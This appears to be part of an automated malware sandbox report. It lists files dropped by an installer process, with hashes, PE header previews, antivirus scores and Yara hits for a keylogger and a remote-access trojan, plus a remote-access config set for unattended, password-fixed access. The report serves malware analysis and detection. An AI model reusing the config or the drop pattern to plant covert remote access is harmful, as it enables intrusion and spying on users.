                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:RPCS0cSUktNimb/JZqNFcbJ3bZJNlvI8CjBMUC6eVc4/SK:RPCS0c1ktNimbqYZJNlvVc4L
                                                                                                                                MD5:96D413CAAF8C7793A96EF200F6695922
                                                                                                                                SHA1:ABFB19A5BEA8724A08A3C709B68C65178E8EFBE5
                                                                                                                                SHA-256:5C6E5346C4EF80E1DD211BD5519311ACA01025CE1D3811113A03E657938F370D
                                                                                                                                SHA-512:93BF7AC89AE64948C3E91294DE89478B0F92D9CEFB71C803ABB324E181D783801C87DD6D806B0DB0D3737B3330E37993AE07B9B7D5AACCA9F9F5C3556E23EEE4
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..k...k...k....%B.b....%@....%A.r...P..z...P..}...P..d...Fx.h...k...=...k...J......Y......j.....L.j...k.$.j......j...Richk...........PE..L...Q.xX...........!.........$.......P....................................... ............@.........................0....... ...(.......@........................8..0p..p............................p..@...............\............................text...9........................... ..`.rdata..............................@..@.data...(...........................@....gfids..d...........................@..@.rsrc...@...........................@..@.reloc...8.......:..................@..B................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\is-82POG.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2236144
                                                                                                                                Entropy (8bit):5.624149670958732
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:2HGHuX4EewGQcPryfFMoxJ+4PulW/ChEIgTS/zRUm:2HGOX4CGQtMs+WuVge/em
                                                                                                                                MD5:BCCF6A5C2595EEA84533692BB788D8BB
                                                                                                                                SHA1:24318226F145E52B7633A4E9E844D6EAD43B75AC
                                                                                                                                SHA-256:ABF75DE674428E112F90F1C618218FF73EF851F4F09C5F5BA8B69E79A6C74DBF
                                                                                                                                SHA-512:78F24F0812AAE31E83340ADEB1A1AE8C00EDFDF483E299706F863CB713BFDC2501B5418CE8F8BD9131E3C704BFFB58A8CA05C5E0A75EB19F15E0409C5B74E35B
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............}...}...}.K....}.K..._.}.K.....}...~..}...y..}.......}...|.W.}...x...}...x...}...}...}......}.......}.......}.Rich..}.................PE..L..."..[...........!.........x.......................................................,"...@.........................P.,.^....s-.P.....-.0.............".......-.....`.+.8...................@.+.......+.@............p-..............................textbss.T...............................text.......p...................... ..`.rdata....... '.....................@..@.data....`....-..@.... .............@....idata.......p-....... .............@..@.msvcjmc......-....... .............@....tls..........-....... .............@....00cfg........-....... .............@..@.rsrc...0.....-....... .............@..@.reloc........-....... .............@..B................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\is-88TFK.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):970912
                                                                                                                                Entropy (8bit):6.9649735952029515
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                                MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                                SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                                SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                                SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\is-951GK.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):581304
                                                                                                                                Entropy (8bit):6.580382227041057
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:bj4Q3+oAscridrDg76u3HsBTc9GtIGPi2Emvh5/kJSMl0yomcY/nRwl2Sp:bHYXSTMGtNPitm1yomJ/n+tp
                                                                                                                                MD5:CDC5A8221738C1CA66564755BB58138C
                                                                                                                                SHA1:EF096A2CAF133D217C202C147855F2CEE7ECD105
                                                                                                                                SHA-256:DF5CEF85E92C6FFFAAC0ACDCE645AED3C5FA1F8FE7F9700D84CA08468AD3D5E3
                                                                                                                                SHA-512:A9F3E256518771C1C97374E7AE3EE19EBEC0D794CD740E059DBC8289356CF1FB5D4A19F2677DB2ADBB179A73520AAEC67947DCF4C8BCD930206DE4B6CDCAD4C6
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9...}..O}..O}..O.|*Ol..O.|(O...O.|)Oc..O/..Nd..O/..N...O/..N_..O...Ol..O}..O...O..Nh..O..N|..O.$O|..O}.LO|..O..N|..ORich}..O........PE..L...L..a...........!..... ...........m.......0......................................C.....@.........................0...P...............0................$.......[......p..............................@............0...............................text............ .................. ..`.rdata..H....0.......$..............@..@.data....d... ...D..................@....rsrc...0............X..............@..@.reloc...[.......\...^..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\is-AFM1F.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):586
                                                                                                                                Entropy (8bit):5.203397968860563
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:L1YWzRcSbZKsNlTQ/dw/7y/x5/D++472p+fso+9hffAaJYQMhsK/qI8qP:Z7zRcSbZKKlcMypJD5KxkiaJosBq
                                                                                                                                MD5:5D7974984AE3D593B7887CC7BDA866DD
                                                                                                                                SHA1:9C0B2EC2659812F1E46F2D32F82E61DF223C674C
                                                                                                                                SHA-256:7888BDB632F1BC5EB6DAE5624FE9065868D279E50ACC569D3DDE0F6DB1C95051
                                                                                                                                SHA-512:7BDACFBCE85726A683C3A316F578A88D5991E37C8FB1E13FC4715141F5752E7FD5D145AC36730B637E26FD3198EDE2D27E86F5CF7283A0C9B08579B1056B0B70
                                                                                                                                Malicious:false
                                                                                                                                Preview:[config]..Security.FixPass=4297F44B13955235245B2497399D7A93..Main.Autorun=1..Main.CloseButtonOperation=0..Main.CheckUpdates=0..Security.UseLocalSecuritySettings=1..Security.DynPassKind=0..Security.PassLifetime=0..Security.CanWinAuth=1..Security.AccessKind=1..Security.CanWinLoginAnotherUser=1..Security.UNCONTROLLED_ACCESS=1..Security.CanWinLoginNotAdmin=1..Security.DenyRemoteSettingsControl=0..Security.DenyLockControls=0..Log.ServerStoreTechLog=0..Main.AWAYMODE_REQUIRED=1..Main.LogsLifetime=1..Main.LogsForMail2Support=1..ProxySettings.UseKind=1..ProxySettings.StoreUserAndPassw=1..

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7543992
                                                                                                                                Entropy (8bit):6.717610928993395
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:98304:q0f/bCIDcCkgVmZqIXrdoXj++CEKDFBaVOGizeKFUtqiAp+hRWmMLlJ7p1:X/bCIPkgVpycKDFqOLNUtqiAz
                                                                                                                                MD5:8002D9E5851728EB024B398CF19DE390
                                                                                                                                SHA1:9A1DC7134F3F6FCCB37DFC4DDDA35DFA2875095E
                                                                                                                                SHA-256:B8DDE42C70D8C4A3511D5EDFFBC9F7F0C03DBDA980E29693E71344F76DA6BB0F
                                                                                                                                SHA-512:6936B6B01F9FC2F2F69DE6AE468A9F7173239BD003AD8B7BC7336C4DD4DB50457E20EC6783B2E8A166D684A56F3F1E9FB701CA903DF3F74E3CA25C46B8A8D00E
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TVrat, Description: Yara detected TVrat, Source: C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmp, Author: Joe Security
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....@a..................K..`'.......K.......K...@...........................y.......s..........@............................S..m....X..f ...........r..$... T.8d............T...............T.....................@.S..............................text... .J.......J................. ..`.itext..$.....J.......J............. ..`.data...T"....K..$....K.............@....bss..........M.......M..................idata...m....S..n....M.............@....tls....D.....T......*N..................rdata..#.....T......*N.............@..@.reloc..8d... T..f...,N.............@..B.rsrc....f ...X..f ...R.............@..@..............y.......r.............@..@................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\is-JCPUK.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):546816
                                                                                                                                Entropy (8bit):6.657309146326691
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:DEnhioDz6zv6pmEmE5A8K8ZOO2rKQrbdCPAEI:Dmbz+vomEBHbZO2YCBI
                                                                                                                                MD5:13CD45DF8AAA584EBD2A40EDE76F1E06
                                                                                                                                SHA1:BAA19E6A965621CB315E5F866EDC179EF1D6B863
                                                                                                                                SHA-256:3FF4E80E327F298A11E116A517BE0963A0B3CD376A6A624CAFFACD586E6B1449
                                                                                                                                SHA-512:285D7265AC05CECDD43650E5DEF9198B5F2F4D63665739BAA059598E41F4CE892248D3CA7E793AC274DC05B4C19CFA11C17FAEA62FC1E3495C94A03851049328
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z%...K..K..K..sH..K..sN...K..sO..K.4....K..sN..K..sO..K..sH..K..sJ..K..J.k.K..rO.>.K..rK..K..r...K.....K..rI..K.Rich..K.................PE..L......_...........!......................................................................@.............................0...0...x....@.......................P...H......................................@............................................text...D........................... ..`.rdata..ZQ.......R..................@..@.data...x+..........................@....rsrc........@......................@..@.reloc...H...P...J..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\is-KGLTC.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1388688
                                                                                                                                Entropy (8bit):6.85745413435775
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:vNaU+KpPikndiNfzN4jH3PlMQzMjYpOtJqTp/kqg1+:xlUfzN4jH3PlyjYpOLqd/kP1+
                                                                                                                                MD5:3B838DC25E96877A1852966F75A5C44A
                                                                                                                                SHA1:555E1830829B008D66FF591D87AC235F6286AB9A
                                                                                                                                SHA-256:292C9367E5F978D2085192B85BCFEA7DF3A033172703BCCF1FF28A74D65D5AC1
                                                                                                                                SHA-512:B5A7F05CD721FC75B77BB33528F746E865C2277A32F3AA312A974DE903A817B7C83E7698980A496B5D04595B21926E94CF9F70A15CD0882D57BA25014BA775D6
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......lU.*(4.y(4.y(4.y!L<y.4.y!L-y34.y(4.y.4.y...y#4.y(4.y=4.y!L;y.6.y!L*y)4.y!L,y)4.y!L)y)4.yRich(4.y................PE..L...#..]...........!.................................................................:...............................A.......6..x.......0...........................p...................................@...............(............................text............................... ..`.rdata..XY.......Z..................@..@.data............t..................@....rsrc...0............Z..............@..@.reloc..,............`..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\is-ND9BQ.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1074302464
                                                                                                                                Entropy (8bit):0.0076066072746656796
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:
                                                                                                                                MD5:F9EE295F34E22150DB8EDD2392482148
                                                                                                                                SHA1:60B9700E56D3D79FB0B2DA7DE1E3B964AC4522A4
                                                                                                                                SHA-256:5040D2F22275B4C59FA1D282440B228CA1327A66D5A82A9C6D313271EBAEE91E
                                                                                                                                SHA-512:E8FFDF207E8FC62543D9FE51423053F4F762CFC9C5106A422E1A3F30D96478AEC34C9CE7E381DE2FBA3B0745D1A4723EDEC626528E8EB4C5898D58E764F674AA
                                                                                                                                Malicious:true
                                                                                                                                Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L...Q..c...........!...I.p........... ... ..........................................ru....@.....................................................................V....................................................................................edata..............................@..@.code...9o... ...p.................. ..`.data...9............v..............@....rdata..............................@..@.reloc..V...........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\is-PDD2G.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):17648
                                                                                                                                Entropy (8bit):6.317642988990049
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:ZPkFNiOMTd1th9gQIim+4vBDVU376TFNiWC:iNhMpXgIr4vBBYANi1
                                                                                                                                MD5:ACF7048E2347CFD66CD17648DBFBAF45
                                                                                                                                SHA1:DF5A12E399176771DC8CF2F7D0CF5548E41E2BB3
                                                                                                                                SHA-256:F1CFFBC2ADA8491755C76360AAD14314DEB576AA65F503E52FA24DEE7D33D8E7
                                                                                                                                SHA-512:51A53CB700FBB7ABF3BDA3101ED0885572460C1686D07C3D2125C8AA6F0834E30528BEE78CC40EE9270714A16AC769D16F5A916F37F0E48BBF7121202E58E0C0
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......):5.m[[.m[[.m[[.d#..o[[.d#..c[[.d#..o[[.d#..j[[.m[Z.S[[.d#..k[[.d#..l[[.d#..l[[.Richm[[.........PE..L......K...........!.........................0...............................p............@..........................<..N...|6..P....P...............0.......`..$....................................4..@............0...............................text...;........................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc........P.......(..............@..@.reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\is-SD6OU.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2533560
                                                                                                                                Entropy (8bit):6.236092740507617
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:y+PXMbxU8+hh5Mitv70n8yT1CPwDv3uFfJEkyD9:y+PwEMit0n8A1CPwDv3uFfJC
                                                                                                                                MD5:59A3B581020759D52538425A1F5A53D5
                                                                                                                                SHA1:4E7C528EFEF2C42119C80EFE0AA994B7AA6D2AB6
                                                                                                                                SHA-256:4C94F00150231420A0526E9949AC9F339EB04B16BC18CB8A11C7FD98DB1235D6
                                                                                                                                SHA-512:9D30D8167E787FD4A82444BAAA3703920EC41CBE9C684010B63564DE04E00D590C8081006C68627B8297D2715194D4B80C23B959E554D42B2770664D1ED1B79E
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[J...+...+...+...S#..+..MC...+..MC...+..MC...+..MC...+..DC...+...+...+...+...+...B..j)...B...+...BO..+...B...+..Rich.+..........PE..L.....7a...........!.....T...p......;H.......p................................'.......&...@...........................#..h....%.T.....&.|.............&..$....&.L...0.".8...........................h.".@.............%..............................text...>S.......T.................. ..`.rdata.......p.......X..............@..@.data....Y...p%......X%.............@....idata..J.....%......n%.............@..@.00cfg........%.......%.............@..@.rsrc...|.....&.......%.............@..@.reloc........&.......%.............@..B........................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\is-UA1D6.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):541880
                                                                                                                                Entropy (8bit):5.766958615909
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:ghUZvMdmP9OwMJvP2jkIgEIdwKADpiw7FCPU2lvzTNl:BhMsPG2udwLdigFyU2lvzTNl
                                                                                                                                MD5:753B75570811052953F336261E3031BB
                                                                                                                                SHA1:2244CCE49368180C1CF6BCA0C57DAEC71401C4F7
                                                                                                                                SHA-256:603C5FD4E29C14DF02937DF765BF76E067A7A4706130D93F947106D0AE09A9DE
                                                                                                                                SHA-512:6C81B813A79077E7157CF7F647A1F3C31A71098037C7003BC40B70E4AADAFCF490FDC01C71A26F8FED8C97BA33B41DF5B8A0D479DA951459CBD56421705813C5
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............K...K...K..wK...K..J...K..J...K..J...K..J...K..J...K)..J...K...Km..K)..J...K)..J...K)..K...K)..J...KRich...K................PE..L.....7a...........!.........................................................p............@..........................)...N........... ..s............ ...$...0...5......8...........................H...@............................................text............................... ..`.rdata...g.......h..................@..@.data....;.......6...`..............@....idata..=A.......B..................@..@.00cfg..............................@..@.rsrc...s.... ......................@..@.reloc..`=...0...>..................@..B................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\is-VCJTB.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2098416
                                                                                                                                Entropy (8bit):6.277915381502377
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:Vkv4EyvQ/qpyr0kAYdQqqW6qvHewDe01CPwDv3uFR0b5YrpsJ:VkvXyvQ/qpyr0kAd66oewv1CPwDv3uFI
                                                                                                                                MD5:1AFC9BD5E625E85B696141F62FBA4325
                                                                                                                                SHA1:56FB325125F436D7408808446D58AF50F8AA3BFC
                                                                                                                                SHA-256:83A1E3CBE242B978B9F55273B7B2648D0492B741FF561C0EC1C6AD9A4AEDAB47
                                                                                                                                SHA-512:02C2CF9DBC319C2AAF324175CFD3E435824439F33B4CA697324F1B8FF4331D7BDE80DE46909FC629193EF02DEB40853E295B35DC2E3B094D116B5DD783919213
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........+...x...x...x...x...x..,x...x...x...x...x...x(.8x...x...xT..x...x...x@s.x...x@s/x...x..(x...x@s-x...xRich...x................PE..L....<.Y...........!.....j...................................................` ....... ...@.............................1...c..x.................................. ...8............................w..@............`...............................text....i.......j.................. ..`.rdata..XA.......B...n..............@..@.data............Z..................@....idata..M....`......................@..@.rsrc...............................@..@.reloc..z............&..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\libcrypto-1_1.dll (copy)

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2533560
                                                                                                                                Entropy (8bit):6.236092740507617
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:y+PXMbxU8+hh5Mitv70n8yT1CPwDv3uFfJEkyD9:y+PwEMit0n8A1CPwDv3uFfJC
                                                                                                                                MD5:59A3B581020759D52538425A1F5A53D5
                                                                                                                                SHA1:4E7C528EFEF2C42119C80EFE0AA994B7AA6D2AB6
                                                                                                                                SHA-256:4C94F00150231420A0526E9949AC9F339EB04B16BC18CB8A11C7FD98DB1235D6
                                                                                                                                SHA-512:9D30D8167E787FD4A82444BAAA3703920EC41CBE9C684010B63564DE04E00D590C8081006C68627B8297D2715194D4B80C23B959E554D42B2770664D1ED1B79E
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[J...+...+...+...S#..+..MC...+..MC...+..MC...+..MC...+..DC...+...+...+...+...+...B..j)...B...+...BO..+...B...+..Rich.+..........PE..L.....7a...........!.....T...p......;H.......p................................'.......&...@...........................#..h....%.T.....&.|.............&..$....&.L...0.".8...........................h.".@.............%..............................text...>S.......T.................. ..`.rdata.......p.......X..............@..@.data....Y...p%......X%.............@....idata..J.....%......n%.............@..@.00cfg........%.......%.............@..@.rsrc...|.....&.......%.............@..@.reloc........&.......%.............@..B........................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\libcryptoMD.dll (copy)

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2098416
                                                                                                                                Entropy (8bit):6.277915381502377
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:Vkv4EyvQ/qpyr0kAYdQqqW6qvHewDe01CPwDv3uFR0b5YrpsJ:VkvXyvQ/qpyr0kAd66oewv1CPwDv3uFI
                                                                                                                                MD5:1AFC9BD5E625E85B696141F62FBA4325
                                                                                                                                SHA1:56FB325125F436D7408808446D58AF50F8AA3BFC
                                                                                                                                SHA-256:83A1E3CBE242B978B9F55273B7B2648D0492B741FF561C0EC1C6AD9A4AEDAB47
                                                                                                                                SHA-512:02C2CF9DBC319C2AAF324175CFD3E435824439F33B4CA697324F1B8FF4331D7BDE80DE46909FC629193EF02DEB40853E295B35DC2E3B094D116B5DD783919213
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........+...x...x...x...x...x..,x...x...x...x...x...x(.8x...x...xT..x...x...x@s.x...x@s/x...x..(x...x@s-x...xRich...x................PE..L....<.Y...........!.....j...................................................` ....... ...@.............................1...c..x.................................. ...8............................w..@............`...............................text....i.......j.................. ..`.rdata..XA.......B...n..............@..@.data............Z..................@....idata..M....`......................@..@.rsrc...............................@..@.reloc..z............&..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\libcurl.dll (copy)

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):546816
                                                                                                                                Entropy (8bit):6.657309146326691
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:DEnhioDz6zv6pmEmE5A8K8ZOO2rKQrbdCPAEI:Dmbz+vomEBHbZO2YCBI
                                                                                                                                MD5:13CD45DF8AAA584EBD2A40EDE76F1E06
                                                                                                                                SHA1:BAA19E6A965621CB315E5F866EDC179EF1D6B863
                                                                                                                                SHA-256:3FF4E80E327F298A11E116A517BE0963A0B3CD376A6A624CAFFACD586E6B1449
                                                                                                                                SHA-512:285D7265AC05CECDD43650E5DEF9198B5F2F4D63665739BAA059598E41F4CE892248D3CA7E793AC274DC05B4C19CFA11C17FAEA62FC1E3495C94A03851049328
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z%...K..K..K..sH..K..sN...K..sO..K.4....K..sN..K..sO..K..sH..K..sJ..K..J.k.K..rO.>.K..rK..K..r...K.....K..rI..K.Rich..K.................PE..L......_...........!......................................................................@.............................0...0...x....@.......................P...H......................................@............................................text...D........................... ..`.rdata..ZQ.......R..................@..@.data...x+..........................@....rsrc........@......................@..@.reloc...H...P...J..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\libeay32.dll (copy)

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1388688
                                                                                                                                Entropy (8bit):6.85745413435775
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:vNaU+KpPikndiNfzN4jH3PlMQzMjYpOtJqTp/kqg1+:xlUfzN4jH3PlyjYpOLqd/kP1+
                                                                                                                                MD5:3B838DC25E96877A1852966F75A5C44A
                                                                                                                                SHA1:555E1830829B008D66FF591D87AC235F6286AB9A
                                                                                                                                SHA-256:292C9367E5F978D2085192B85BCFEA7DF3A033172703BCCF1FF28A74D65D5AC1
                                                                                                                                SHA-512:B5A7F05CD721FC75B77BB33528F746E865C2277A32F3AA312A974DE903A817B7C83E7698980A496B5D04595B21926E94CF9F70A15CD0882D57BA25014BA775D6
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......lU.*(4.y(4.y(4.y!L<y.4.y!L-y34.y(4.y.4.y...y#4.y(4.y=4.y!L;y.6.y!L*y)4.y!L,y)4.y!L)y)4.yRich(4.y................PE..L...#..]...........!.................................................................:...............................A.......6..x.......0...........................p...................................@...............(............................text............................... ..`.rdata..XY.......Z..................@..@.data............t..................@....rsrc...0............Z..............@..@.reloc..,............`..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\libjpeg-turbo-win.dll (copy)

                                                                                                                                Download File
